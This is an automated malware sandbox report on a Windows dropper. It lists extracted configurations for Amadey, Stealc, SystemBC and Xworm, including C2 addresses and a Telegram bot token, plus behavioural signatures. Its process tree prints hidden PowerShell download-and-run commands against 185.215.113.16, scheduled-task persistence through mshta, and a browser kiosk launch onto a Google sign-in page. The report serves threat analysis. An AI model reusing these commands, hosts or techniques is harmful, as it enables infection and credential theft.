Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-02-2025 07:48

General

  • Target

    88345910e7756216c80bf4046952980b.exe

  • Size

    2.1MB

  • MD5

    88345910e7756216c80bf4046952980b

  • SHA1

    f508e862e3d2b48a83dfa064d4655035953482c0

  • SHA256

    c9b511ede4963bc4ce43425a950014c7b4fedde81add8febb049359e2d3e4704

  • SHA512

    a53f0242ae77be006bf9d22b42764de414f94e98dd5eb716db5d7286555826a3317a80a00c0c2448ad836c16181168c5f77da954cc29978f1d023bac42d28845

  • SSDEEP

    49152:yhpo+E+QRPrT0O7tDr5uWwt4ZKYXhRn+lOxfMfps:yhy+xIzT0A5uruXLn+lOxfMf

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz

Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

93.186.202.3

Attributes
  • dns

    5.132.191.104

Extracted

Family

xworm

Version

5.0

C2

185.163.204.65:7000

Mutex

SWaSxcOz2FkLWFU7

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Poverty Stealer Payload 1 IoCs
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

  • Povertystealer family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 24 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 22 IoCs
  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 48 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 33 IoCs
  • Identifies Wine through registry keys 2 TTPs 24 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 62 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 38 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\88345910e7756216c80bf4046952980b.exe
    "C:\Users\Admin\AppData\Local\Temp\88345910e7756216c80bf4046952980b.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4972
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1464
      • C:\Users\Admin\AppData\Local\Temp\1091274101\78b2543906.exe
        "C:\Users\Admin\AppData\Local\Temp\1091274101\78b2543906.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1324
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn szJTqmail7h /tr "mshta C:\Users\Admin\AppData\Local\Temp\PT6IsU2Pt.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1016
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn szJTqmail7h /tr "mshta C:\Users\Admin\AppData\Local\Temp\PT6IsU2Pt.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:620
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\PT6IsU2Pt.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1616
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2472
            • C:\Users\Admin\AppData\Local\TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE
              "C:\Users\Admin\AppData\Local\TempATTUCUAOM4AURVHKJ5AEGIVFWW5E2YUY.EXE"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2716
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1140
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" any_word
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3452
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:668
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:768
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3284
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4676
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2368
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4440
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5076
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "kPrXUma0d5h" /tr "mshta \"C:\Temp\pQy5eYFwx.hta\"" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1980
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\pQy5eYFwx.hta"
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4812
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1116
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2124
      • C:\Users\Admin\AppData\Local\Temp\1091314001\60cad02928.exe
        "C:\Users\Admin\AppData\Local\Temp\1091314001\60cad02928.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4680
      • C:\Users\Admin\AppData\Local\Temp\1091315001\0bb5042f9a.exe
        "C:\Users\Admin\AppData\Local\Temp\1091315001\0bb5042f9a.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3016
      • C:\Users\Admin\AppData\Local\Temp\1091316001\0d13ae9780.exe
        "C:\Users\Admin\AppData\Local\Temp\1091316001\0d13ae9780.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1912
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:380
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2492
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4668
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4832
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4968
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
            PID:5100
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
              5⤵
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:3704
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 27352 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b9c3599-f0a8-4e33-9dd4-0ae86a895421} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" gpu
                6⤵
                  PID:4076
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2400 -prefsLen 28272 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {231f7e8e-2982-4e3d-ad70-c829351a1992} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" socket
                  6⤵
                    PID:4904
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3460 -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3340 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {906aadc9-4bd1-4e69-a407-9ff3addfc948} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab
                    6⤵
                      PID:4488
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4040 -childID 2 -isForBrowser -prefsHandle 3992 -prefMapHandle 3988 -prefsLen 32762 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9d612de-c227-4262-b289-4717afb616ec} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab
                      6⤵
                        PID:1264
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4752 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4776 -prefMapHandle 4772 -prefsLen 32762 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd3f1cc9-be11-43bb-a019-9478feeaafd6} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" utility
                        6⤵
                        • Checks processor information in registry
                        PID:5236
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5216 -childID 3 -isForBrowser -prefsHandle 5164 -prefMapHandle 5208 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f98a7406-1cd2-4e72-aebb-52bad53dab01} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab
                        6⤵
                          PID:5748
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5368 -childID 4 -isForBrowser -prefsHandle 4188 -prefMapHandle 5232 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b85271b-0cd2-4534-97e0-ef14101495cd} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab
                          6⤵
                            PID:5772
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5580 -childID 5 -isForBrowser -prefsHandle 5652 -prefMapHandle 5644 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6138cd1-013b-4350-8fd8-a09932a9ee1f} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab
                            6⤵
                              PID:5788
                      • C:\Users\Admin\AppData\Local\Temp\1091317001\91a34343bc.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091317001\91a34343bc.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:4176
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c schtasks /create /tn pzT8Hman5CG /tr "mshta C:\Users\Admin\AppData\Local\Temp\2qCELHNfo.hta" /sc minute /mo 25 /ru "Admin" /f
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2712
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /tn pzT8Hman5CG /tr "mshta C:\Users\Admin\AppData\Local\Temp\2qCELHNfo.hta" /sc minute /mo 25 /ru "Admin" /f
                            5⤵
                            • System Location Discovery: System Language Discovery
                            • Scheduled Task/Job: Scheduled Task
                            PID:1980
                        • C:\Windows\SysWOW64\mshta.exe
                          mshta C:\Users\Admin\AppData\Local\Temp\2qCELHNfo.hta
                          4⤵
                          • Checks computer location settings
                          • System Location Discovery: System Language Discovery
                          PID:2516
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                            5⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Downloads MZ/PE file
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1648
                            • C:\Users\Admin\AppData\Local\TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE
                              "C:\Users\Admin\AppData\Local\TempPHAHBIS4BFQXTSNMRSVJUL5Y7RXHUVCH.EXE"
                              6⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5404
                      • C:\Users\Admin\AppData\Local\Temp\1091318001\5c66c0d7c6.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091318001\5c66c0d7c6.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3124
                      • C:\Users\Admin\AppData\Local\Temp\1091319001\d6a6205f6a.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091319001\d6a6205f6a.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5520
                      • C:\Users\Admin\AppData\Local\Temp\1091320001\40571ba010.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091320001\40571ba010.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:3000
                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:5156
                      • C:\Users\Admin\AppData\Local\Temp\1091321001\49e58b4688.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091321001\49e58b4688.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1116
                      • C:\Users\Admin\AppData\Local\Temp\1091322001\da79c1018d.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091322001\da79c1018d.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5920
                      • C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:6084
                      • C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2996
                      • C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:5044
                        • C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:4676
                      • C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        PID:4572
                        • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                          "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                          4⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          PID:5544
                          • C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe
                            "C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:6112
                      • C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        PID:5856
                      • C:\Users\Admin\AppData\Local\Temp\1091328001\a4809023d2.exe
                        "C:\Users\Admin\AppData\Local\Temp\1091328001\a4809023d2.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5272
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2308
